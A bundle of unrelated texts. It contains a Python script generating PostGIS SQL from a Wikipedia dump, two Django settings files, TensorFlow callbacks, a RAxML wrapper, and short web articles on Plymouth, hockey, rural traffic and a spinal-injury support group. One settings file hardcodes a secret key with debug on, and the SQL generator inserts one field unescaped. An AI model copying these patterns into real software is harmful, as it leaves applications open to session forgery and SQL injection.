"natural" VARCHAR(127),
"nkp" INT,
"kp" INT,
"osm_id" BIGINT
);
SELECT AddGeometryColumn('wiki', 'way', 900913, 'POINT', 2);
"""
page = False
id = 0;
for event, elem in context:
if elem.tag == "{http://www.mediawiki.org/xml/export-0.6/}page":
page = event == 'start'
if event == 'end':
if geo_cz or geo_dms or geo:
cats = ';'.join(categories) if categories else ''
id += 1;
tmp = parseGeoLocation(geo_cz, geo_dms, geo, None)  # coord extraction not implemented yet
if tmp:
print "INSERT INTO wiki (id,way,title,name,infobox,status,ele,population,cats,text_length) VALUES (%(id)s,ST_Transform(ST_SetSRID(ST_MakePoint(%(lon)s,%(lat)s),4326),900913),%(title)s,%(name)s,%(infobox)s,%(status)s,%(ele)s,%(population)s,%(cats)s,%(text_length)s);" % {
'id': id,
'lat': tmp[0],
'lon': tmp[1],
'title': ("'" + replace(title,"'","''") + "'") if title else 'null',
'name': ("'" + replace(name,"'","''") + "'") if name else 'null',
'infobox': ("'" + infobox + "'") if infobox else 'null',
'status': ("'" + replace(status,"'","''") + "'") if status else 'null',
'ele': ("'" + str(ele) + "'") if ele else 'null',
'population': ("'" + str(population) + "'") if population else 'null',
'cats': ("'" + replace(cats,"'","''") + "'") if cats else 'null',
'text_length': ("'" + str(text_length) + "'") if text_length else 'null'
}
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
elif page and event == 'end':
if elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}title':
title = elem.text
elif elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}text':
if elem.text:
text = replace(elem.text,' ',' ')
text_length = len(text)
geo_cz = geo_cz_pattern.search(text)
geo_cz = geo_cz.group(1) if geo_cz else None
geo_dms = geo_dms_pattern.search(text)
geo_dms = geo_dms.group(1) if geo_dms else None
geo = geo_pattern.search(text)
geo = geo.group(1) if geo else None
categories = category_pattern.findall(text)
infobox = infobox_pattern.search(text)
infobox = infobox.group(1).strip() if infobox else None
try:
ele = ele_pattern.search(text)
ele = int(re.sub("[^0-9]",'',ele.group(1))) if ele else None
except:
ele = None
try:
population = population_pattern.search(text)
population = int(re.sub("[^0-9]",'',population.group(1))) if population else None
except:
population = None
status = status_pattern.search(text)
status = status.group(1).strip() if status else None
name = name_pattern.search(text)
name = name.group(1).strip() if name else None
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
if event == 'end':
root.clear()
print """
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P.place IN ('city','town','village','hamlet','isolated_dwelling','suburb','neighbourhood')
AND COALESCE(W.name,W.title) = P.name
AND ST_DWithin(W.way,P.way,3000)
AND W.population IS NOT NULL;
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P."natural" = 'peak'
AND W.infobox = 'hora'
AND (
(ST_DWithin(W.way,P.way,300) AND COALESCE(W.name,W.title) = P.name)
OR (ST_DWithin(W.way,P.way,100) AND (W.name IS NULL OR P.name IS NULL))
OR ST_DWithin(W.way,P.way,30)
);
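-- Fuzzy name matching used by the updates below: the allowed distance between
-- a wiki point and an OSM feature grows with the pg_trgm similarity() of the
-- two names after generic type words (hrad, zamek, zricenina, tvrz, kostel,
-- ...) are stripped, and the closest candidate per similarity-weighted
-- distance wins.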
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('castle','ruins')
AND (
ST_DWithin(W.way,P.way,1000 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek|tvrz','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek|tvrz','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek|tvrz','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek|tvrz','','i')))
LIMIT 1
)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Tvrze %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'place_of_worship'
AND (
ST_DWithin(W.way,P.way,300 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i')))
LIMIT 1
)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'theatre'
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,tourism FROM planet_osm_point
UNION SELECT osm_id,name,way,tourism FROM planet_osm_polygon) P
WHERE
P.tourism IN ('museum','gallery')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Muzea %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('memorial','monument')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Pomn_ky a pam_tn_ky %');
UPDATE wiki W
SET "natural" = 'peak'
WHERE W.infobox = 'hora';
UPDATE wiki W
SET
historic = 'castle',
castle_type = (CASE
WHEN W.cats LIKE ('%Hrady %') OR W.cats LIKE ('%Z__ceniny hrad_ %') THEN 'defensive'
WHEN W.cats LIKE ('%Z_mky %') THEN 'stately'
ELSE NULL
END),
ruins = (CASE
WHEN W.cats LIKE ('%Z__ceniny %') THEN 1
ELSE NULL
END)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET
amenity = 'place_of_worship',
religion = (CASE
WHEN W.cats LIKE ('%Me_ity %') THEN 'muslim'
WHEN W.cats LIKE ('%Synagogy %') THEN 'jewish'
ELSE 'christian'
END),
place_of_worship = (CASE
WHEN W.cats LIKE ('%Kaple %') THEN 'chapel'
WHEN W.cats LIKE ('%Kl__tery %') THEN 'monastery'
ELSE 'church'
END)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET amenity = 'theatre'
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET tourism = 'museum'
WHERE
W.cats LIKE ('%Muzea %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET nkp = 1
WHERE
W.cats LIKE ('%N_rodn_ kulturn_ p_m_tky %');
UPDATE wiki W
SET kp = 1
WHERE
W.cats LIKE ('%Kulturn_ p_m_tky %');
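-- Typical pipeline (a sketch; file names are illustrative, not fixed by this
-- script): bzcat cswiki-pages-articles.xml.bz2 | python this_script.py | psql gis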
"""
|
Once on The Hoe you can enjoy its stunning panoramic vistas over the waters of Plymouth Sound. Beyond, in clear weather, the fine needle of the Eddystone Lighthouse (9 miles distant) and the far horizon of the Atlantic Ocean's Western Approaches to Britain and Europe are just visible. These maritime features form part of the direct physical and cultural connections, by sea, between Plymouth and the United States of America, and are hence the provenance for much of the city's great weight of American heritage.
Plymouth Sound is also ranked as one of the largest natural harbours in the world. Its sheltered waters were made all the safer, back in the days of sail, by the groundbreaking construction (during the years 1812-41) of the Plymouth Breakwater, a still visually prominent and much-valued aid to the Port's naval and commercial shipping today.
During the 1930s many of the greatest transatlantic ocean liners could be seen regularly in the Sound, embarking or disembarking passengers and mail by a flotilla of tenders. These included the White Star Line's "Olympic" (Titanic's sister ship), Cunard's "Mauretania" (holder of the "Blue Riband" 1905-35) and "Queen Mary" (now moored at Long Beach, California), the "Ile de France", "Normandie", "George Washington", "Leviathan" and others. Earlier, during the First World War, 33,000 men of the Canadian Expeditionary Force disembarked here from a fleet of 32 liners upon their arrival in the Sound. |
"""
Django settings for Pokemon Only project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.join(BASE_DIR, 'data')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
with open(os.path.join(DATA_DIR, 'secret_key.txt')) as f:
SECRET_KEY = f.read().strip()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'stall',
'tourney',
'pmo2015',
'pmo2016',
'dashboard',
'captcha',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'msite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
'templates'
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'msite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
"static/",
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
BASE_URL = 'https://www.getdaze.org'
CONTACT_EMAIL = '[email protected]'
WEIBO_URL = 'http://weibo.com/SHPMO'
CURRENT_PMO = 'pmo2020'
# Email settings
with open(os.path.join(DATA_DIR, 'secret_email.txt')) as f:
EMAIL_HOST, EMAIL_HOST_USER, EMAIL_HOST_PASSWORD = f.read().split()
EMAIL_PORT = 587
EMAIL_SUBJECT_PREFIX = '[%s] ' % CURRENT_PMO.upper()
EMAIL_USE_TLS = True
import pmo2015.helpers
CAPTCHA_CHALLENGE_FUNCT = pmo2015.helpers.word_challenge
CAPTCHA_IMAGE_SIZE = (300, 31)
PMO_LIST = {
'unknown': False,
'pmo2015': False,
'pmo2016': False,
'pmo2017': False,
'pmo2018': False,
'pmo2019': False,
'pmo2020': True
}
|
During the two seasons that followed, however, the only lofty numbers the soon-to-be 28-year-old put up were games missed. A variety of ailments, from a concussion to a lingering groin problem that ultimately required surgery, cost Green 83 games, stripping the Capitals of one of their offensive catalysts.
Last season started no differently as another groin injury forced Green to miss 13 games, but upon his return to the lineup in late March, his game clicked. He scored 10 goals in the season's last 19 games, and the Capitals went 15-2-2 en route to the team's fifth Southeast Division crown in six seasons. Green finished with 12 goals, good enough to lead all NHL defensemen for the third time in six seasons.
After the injury-induced hiatus, Washington caught a long-awaited glimpse of the player that took the city and League by storm as a faux-hawked dynamo five seasons before.
"You could tell when he came back that he was healthy," Capitals defenseman Karl Alzner told NHL.com. "You can see guys play a little more confident when they feel that way."
For a player with game-changing talent like Green, confidence is key. Years of toiling on injured reserve would take its toll on anyone, but Green "just left everything else in the dust," and focused on simply playing the game.
"I definitely felt like I was in a different [frame of mind]," Green told NHL.com. "I felt relaxed; I felt that I could come back and play the game the way I like to play.
"I went through a stretch of injuries there. I haven't played hockey in a long time consistently. I just … kind of took the weight off my shoulders and just went out and played the game again and enjoyed myself."
Part of that mental transformation stemmed from coach Adam Oates and his staff's reliance on positive reinforcement, highlighting through video what Green does well as opposed to placing emphasis on fixing mistakes.
"When you constantly hear people telling you, 'Yeah, but you're always hurt,' it's easy to think like that yourself," assistant coach Calle Johansson told NHL.com. "My part would probably be to show him stuff that he does good and pump him full of confidence. Part of my duty is to show that and to prove that to him. It doesn't do any good to dwell on the bad stuff."
In order for the Capitals to compete in the new Metropolitan Division, they will need Green to showcase the smooth-skating and puck-handling abilities that have proven to bolster their already potent lineup when he is healthy. As for how they will know that Green is back to normal, there is an easy tell.
"That would be the other team being on their heels," Johansson said. "They know when Mike Green's on the ice." |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Common modules for callbacks."""
from __future__ import absolute_import
from __future__ import division
# from __future__ import google_type_annotations
from __future__ import print_function
import os
from typing import Any, List, MutableMapping, Optional, Text
from absl import logging
import tensorflow as tf
from official.modeling import optimization
from official.utils.misc import keras_utils
def get_callbacks(
model_checkpoint: bool = True,
include_tensorboard: bool = True,
time_history: bool = True,
track_lr: bool = True,
write_model_weights: bool = True,
apply_moving_average: bool = False,
initial_step: int = 0,
batch_size: int = 0,
log_steps: int = 0,
model_dir: Optional[str] = None,
backup_and_restore: bool = False) -> List[tf.keras.callbacks.Callback]:
"""Get all callbacks."""
model_dir = model_dir or ''
callbacks = []
if model_checkpoint:
ckpt_full_path = os.path.join(model_dir, 'model.ckpt-{epoch:04d}')
callbacks.append(
tf.keras.callbacks.ModelCheckpoint(
ckpt_full_path, save_weights_only=True, verbose=1))
if backup_and_restore:
backup_dir = os.path.join(model_dir, 'tmp')
callbacks.append(
tf.keras.callbacks.experimental.BackupAndRestore(backup_dir))
if include_tensorboard:
callbacks.append(
CustomTensorBoard(
log_dir=model_dir,
track_lr=track_lr,
initial_step=initial_step,
write_images=write_model_weights,
profile_batch=0))
if time_history:
callbacks.append(
keras_utils.TimeHistory(
batch_size,
log_steps,
logdir=model_dir if include_tensorboard else None))
if apply_moving_average:
# Save moving average model to a different file so that
# we can resume training from a checkpoint
ckpt_full_path = os.path.join(model_dir, 'average',
'model.ckpt-{epoch:04d}')
callbacks.append(
AverageModelCheckpoint(
update_weights=False,
filepath=ckpt_full_path,
save_weights_only=True,
verbose=1))
callbacks.append(MovingAverageCallback())
return callbacks
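# Illustrative usage (a sketch; the model, path and step counts are
# placeholders, not values mandated by this module):
#
#   callbacks = get_callbacks(
#       model_checkpoint=True,
#       include_tensorboard=True,
#       time_history=True,
#       batch_size=256,
#       log_steps=100,
#       model_dir='/tmp/model_dir')
#   model.fit(train_ds, epochs=10, callbacks=callbacks)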
def get_scalar_from_tensor(t: tf.Tensor) -> int:
"""Utility function to convert a Tensor to a scalar."""
t = tf.keras.backend.get_value(t)
if callable(t):
return t()
else:
return t
class CustomTensorBoard(tf.keras.callbacks.TensorBoard):
"""A customized TensorBoard callback that tracks additional datapoints.
Metrics tracked:
- Global learning rate
Attributes:
log_dir: the path of the directory where to save the log files to be parsed
by TensorBoard.
track_lr: `bool`, whether or not to track the global learning rate.
initial_step: the initial step, used for preemption recovery.
**kwargs: Additional arguments for backwards compatibility. Possible key is
`period`.
"""
# TODO(b/146499062): track params, flops, log lr, l2 loss,
# classification loss
def __init__(self,
log_dir: str,
track_lr: bool = False,
initial_step: int = 0,
**kwargs):
super(CustomTensorBoard, self).__init__(log_dir=log_dir, **kwargs)
self.step = initial_step
self._track_lr = track_lr
def on_batch_begin(self,
batch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
self.step += 1
if logs is None:
logs = {}
logs.update(self._calculate_metrics())
super(CustomTensorBoard, self).on_batch_begin(batch, logs)
def on_epoch_begin(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
for k, v in metrics.items():
logging.info('Current %s: %f', k, v)
super(CustomTensorBoard, self).on_epoch_begin(epoch, logs)
def on_epoch_end(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
super(CustomTensorBoard, self).on_epoch_end(epoch, logs)
def _calculate_metrics(self) -> MutableMapping[str, Any]:
logs = {}
# TODO(b/149030439): disable LR reporting.
# if self._track_lr:
# logs['learning_rate'] = self._calculate_lr()
return logs
def _calculate_lr(self) -> int:
"""Calculates the learning rate given the current step."""
return get_scalar_from_tensor(
self._get_base_optimizer()._decayed_lr(var_dtype=tf.float32)) # pylint:disable=protected-access
def _get_base_optimizer(self) -> tf.keras.optimizers.Optimizer:
"""Get the base optimizer used by the current model."""
optimizer = self.model.optimizer
# The optimizer might be wrapped by another class, so unwrap it
while hasattr(optimizer, '_optimizer'):
optimizer = optimizer._optimizer # pylint:disable=protected-access
return optimizer
class MovingAverageCallback(tf.keras.callbacks.Callback):
"""A Callback to be used with a `ExponentialMovingAverage` optimizer.
Applies moving average weights to the model during validation time to test
and predict on the averaged weights rather than the current model weights.
Once training is complete, the model weights will be overwritten with the
averaged weights (by default).
Attributes:
overwrite_weights_on_train_end: Whether to overwrite the current model
weights with the averaged weights from the moving average optimizer.
**kwargs: Any additional callback arguments.
"""
def __init__(self, overwrite_weights_on_train_end: bool = False, **kwargs):
super(MovingAverageCallback, self).__init__(**kwargs)
self.overwrite_weights_on_train_end = overwrite_weights_on_train_end
def set_model(self, model: tf.keras.Model):
super(MovingAverageCallback, self).set_model(model)
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
self.model.optimizer.shadow_copy(self.model)
def on_test_begin(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_test_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_train_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
if self.overwrite_weights_on_train_end:
self.model.optimizer.assign_average_vars(self.model.variables)
class AverageModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
"""Saves and, optionally, assigns the averaged weights.
Taken from tfa.callbacks.AverageModelCheckpoint.
Attributes:
update_weights: If True, assign the moving average weights to the model, and
save them. If False, keep the old non-averaged weights, but the saved
model uses the average weights. See `tf.keras.callbacks.ModelCheckpoint`
for the other args.
"""
def __init__(self,
update_weights: bool,
filepath: str,
monitor: str = 'val_loss',
verbose: int = 0,
save_best_only: bool = False,
save_weights_only: bool = False,
mode: str = 'auto',
save_freq: str = 'epoch',
**kwargs):
self.update_weights = update_weights
super().__init__(filepath, monitor, verbose, save_best_only,
save_weights_only, mode, save_freq, **kwargs)
def set_model(self, model):
if not isinstance(model.optimizer, optimization.ExponentialMovingAverage):
raise TypeError('AverageModelCheckpoint is only used when training '
'with MovingAverage')
return super().set_model(model)
def _save_model(self, epoch, logs):
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
if self.update_weights:
self.model.optimizer.assign_average_vars(self.model.variables)
return super()._save_model(epoch, logs)
else:
# Note: `model.get_weights()` gives us the weights (non-ref)
# whereas `model.variables` returns references to the variables.
non_avg_weights = self.model.get_weights()
self.model.optimizer.assign_average_vars(self.model.variables)
# result is currently None, since `super._save_model` doesn't
# return anything, but this may change in the future.
result = super()._save_model(epoch, logs)
self.model.set_weights(non_avg_weights)
return result
|
Moniaive Initiative is currently working with walking charity, Living Streets (Scotland) on their national pilot project: Lower Speed Communities. With communities of all sizes expressing concern over the speed and volume of traffic on their streets, Living Streets will be working with local authorities and community organisations in four pilot communities to support the introduction of 20mph areas. In remote and rural communities such as Glencairn, cars are as vital as they are troublesome. The village of Moniaive was shaped in an era of horse-drawn vehicles, when walking was ‘the norm’, but pavements were not necessary. These narrow streets are now lined with parked cars, and groan under the weight of the HGV and agricultural traffic that powers our local economy.
Lowering vehicular speed is all about redressing the balance between walkers, cyclists, and vehicular traffic. Lower speed communities benefit from cleaner air, less traffic noise, and safer streets. At 30mph, a pedestrian struck by a vehicle has a 1 in 5 chance of being killed; at 20mph that drops to 1 in 40. Remember that next time you drive past the village school.
Our first target will be to increase local support for the principle of a 20mph area. Before we even start to look at imposing speed limits, we want to discuss where the ‘problem areas’ are, and consider a variety of alternative means of encouraging drivers to reduce their speed in these target areas.
Whether you are a pedestrian, a cyclist or a driver – a resident or a visitor – if you have comments or ideas to share on this issue, please do contact us. |
# Django settings for YAAS project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('admin', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'YAASdb.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'h3az0-*^)c!%ur(=_+a88ehr=uf9j$6**r1#1#-%j2h8_&w!c^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'YAAS.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'YAAS.wsgi.application'
import os
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), '..', 'templates').replace('\\','/'),)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'YAASApp',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
We are a vibrant community-based support network that empowers SCI survivors and their families.
We are a group for all those affected by spinal cord injury - new and veteran, family and friends.
OK, SO WHY OREGON SCI?
Our vision is to build a vibrant community-based support network in which people living with SCI/D can thrive…and we are!
Find supporters, resources, and other members near you.
Drop in for a casual meet-up for survivors of SCI, their families, and all those interested in supporting.
Help us better coordinate institutional and informal resources to help those who are newly injured transition smoothly.
Functionally, what level is your injury?
This page connects Portland regional people to the world of people who've had a SCI, their experiences and valuable resources. |
import os
import sys
import logging
import re
import shutil
from glob import glob
log = logging.getLogger("main")
from nprlib.master_task import TreeTask
from nprlib.master_job import Job
from nprlib.utils import (basename, Tree, OrderedDict,
GLOBALS, RAXML_CITE, pjoin, DATATYPES, md5)
from nprlib import db
__all__ = ["Raxml"]
class Raxml(TreeTask):
def __init__(self, nodeid, alg_file, constrain_id, model,
seqtype, conf, confname, parts_id=None):
GLOBALS["citator"].add(RAXML_CITE)
base_args = OrderedDict()
self.bootstrap = conf[confname].get("_bootstrap", None)
model = model or conf[confname]["_aa_model"]
self.confname = confname
self.conf = conf
self.alg_phylip_file = alg_file
try:
self.constrain_tree = db.get_dataid(constrain_id, DATATYPES.constrain_tree)
except ValueError:
self.constrain_tree = None
self.partitions_file = parts_id
TreeTask.__init__(self, nodeid, "tree", "RaxML",
base_args, conf[confname])
max_cores = GLOBALS["_max_cores"]
appname = conf[confname]["_app"]
if max_cores > 1:
threads = conf["threading"].get("raxml-pthreads")
if threads > 1:
appname = appname.replace("raxml", "raxml-pthreads")
raxml_bin = conf["app"][appname]
else:
appname = appname.replace("raxml-pthreads", "raxml")
threads = 1
raxml_bin = conf["app"][appname]
self.raxml_bin = raxml_bin
self.threads = threads
self.seqtype = seqtype
# Process raxml options
method = conf[confname].get("_method", "GAMMA").upper()
if seqtype.lower() == "aa":
self.model_string = 'PROT%s%s' %(method, model.upper())
self.model = model
elif seqtype.lower() == "nt":
self.model_string = 'GTR%s' %method
self.model = "GTR"
else:
raise ValueError("Unknown seqtype %s" % seqtype)
#inv = conf[confname].get("pinv", "").upper()
#freq = conf[confname].get("ebf", "").upper()
self.init()
def load_jobs(self):
args = OrderedDict(self.args)
args["-s"] = pjoin(GLOBALS["input_dir"], self.alg_phylip_file)
args["-m"] = self.model_string
args["-n"] = self.alg_phylip_file
if self.constrain_tree:
log.log(24, "Using constrain tree %s" %self.constrain_tree)
args["-g"] = pjoin(GLOBALS["input_dir"], self.constrain_tree)
if self.partitions_file:
